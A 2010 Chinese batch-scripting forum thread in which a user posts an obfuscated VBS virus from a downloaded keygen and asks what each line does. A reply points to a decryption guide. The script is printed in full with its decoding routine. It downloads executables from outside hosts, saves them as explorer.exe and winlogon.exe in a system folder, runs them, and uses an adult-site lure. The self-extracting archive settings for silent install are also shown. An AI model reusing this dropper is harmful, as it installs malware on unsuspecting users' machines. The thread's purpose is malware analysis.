标题: [已解决]懂VBS脚本的请帮忙分析下这个加密的脚本 [打印本页]
作者: jixun66 时间: 2010-5-3 05:14 标题: [已解决]懂VBS脚本的请帮忙分析下这个加密的脚本
这个文件是病毒,我访问某网站下的注册机,请VB脚本高手帮忙解析一下每句的用处。
下面是VB脚本(另外问问是不是乱码?源文件:http://u.115.com/file/f9cc62347f ,只修改其扩展名为RAR。)
- Heqianwei="何何aa.run锡丹伟iexplore锡丹http://www.mflj.info/tongji.php伟,0何set锡丹aa=wscript.createobject(伟wscript.shell伟)何on锡丹error锡丹resume锡丹next锡丹何何何何objshell.run锡丹伟伟伟C:\WINDOWS\system32\config\explorer.exe伟伟伟锡丹何Set锡丹objShell锡丹=锡丹CreateObject(伟Wscript.Shell伟)锡丹何sGet.SaveToFile锡丹伟C:\WINDOWS\system32\config\explorer.exe伟,2锡丹何sGet.Write(xPost.responseBody)锡丹何sGet.Open()锡丹何sGet.Type锡丹=锡丹1锡丹何sGet.Mode锡丹=锡丹3锡丹何Set锡丹sGet锡丹=锡丹createObject(伟ADODB.Stream伟)锡丹何xPost.Send()锡丹何xPost.Open锡丹伟GET伟,伟http://www.cqzcys.com/1cys/explorer.exe伟,0锡丹何Set锡丹xPost锡丹=锡丹createObject(伟Microsoft.XMLHTTP伟)锡丹何何何何objshell.run锡丹伟伟伟C:\WINDOWS\system32\config\winlogon.exe伟伟伟锡丹何Set锡丹objShell锡丹=锡丹CreateObject(伟Wscript.Shell伟)锡丹何sGet.SaveToFile锡丹伟C:\WINDOWS\system32\config\winlogon.exe伟,2锡丹何sGet.Write(xPost.responseBody)锡丹何sGet.Open()锡丹何sGet.Type锡丹=锡丹1锡丹何sGet.Mode锡丹=锡丹3锡丹何Set锡丹sGet锡丹=锡丹createObject(伟ADODB.Stream伟)锡丹何xPost.Send()锡丹何xPost.Open锡丹伟GET伟,伟http://www.gggirl.info/1cys/winlogon.exe伟,0锡丹何Set锡丹xPost锡丹=锡丹createObject(伟Microsoft.XMLHTTP伟)锡丹何何何何End锡丹If何objShell.Run(伟http://www.gggirl.info/2.php伟)锡丹何Else锡丹何objShell.Run(伟http://www.gggirl.info/2.php伟)锡丹何If锡丹intMessage锡丹=锡丹vbYes锡丹Then锡丹何vbYesNo,锡丹伟Access锡丹Denied伟)锡丹何intMessage锡丹=锡丹Msgbox(伟确定打开国名为最大的成人视频网站吗伟,锡丹_锡丹何Set锡丹objShell锡丹=锡丹CreateObject(伟Wscript.Shell伟)锡丹何"
- Heqianwei = Replace(Heqianwei, "锡丹",chr(9))
- Heqianwei = Replace(Heqianwei, "伟", chr(34))
- Heqianwei = Replace(Heqianwei, "钱", chr(39))
- execute(MyEncode(Heqianwei))
- function MyEncode(hack520org)
- sz = Split(hack520org, "何")
- For i = UBound(sz) To 0 Step -1
- weiwei = weiwei + sz(i) + vbcrlf
- Next
- MyEncode=weiwei
- end function
复制代码
PS,Winrar自解压命令很暴力...
Path=C:\WINDOWS\system32\config
SavePath
Setup=2.vbs
Silent=1
Overwrite=1
[ 本帖最后由 jixun66 于 2010-5-3 18:33 编辑 ]
作者: Batcher 时间: 2010-5-3 09:35
参考:批处理解密破解已经加密的VBS
http://bbs.bathome.net/thread-3637-1-1.html
作者: jixun66 时间: 2010-5-3 18:32
谢谢,这下可以自己分析!
欢迎光临 批处理之家 (http://www.bathome.net/) |
Powered by Discuz! 7.2 |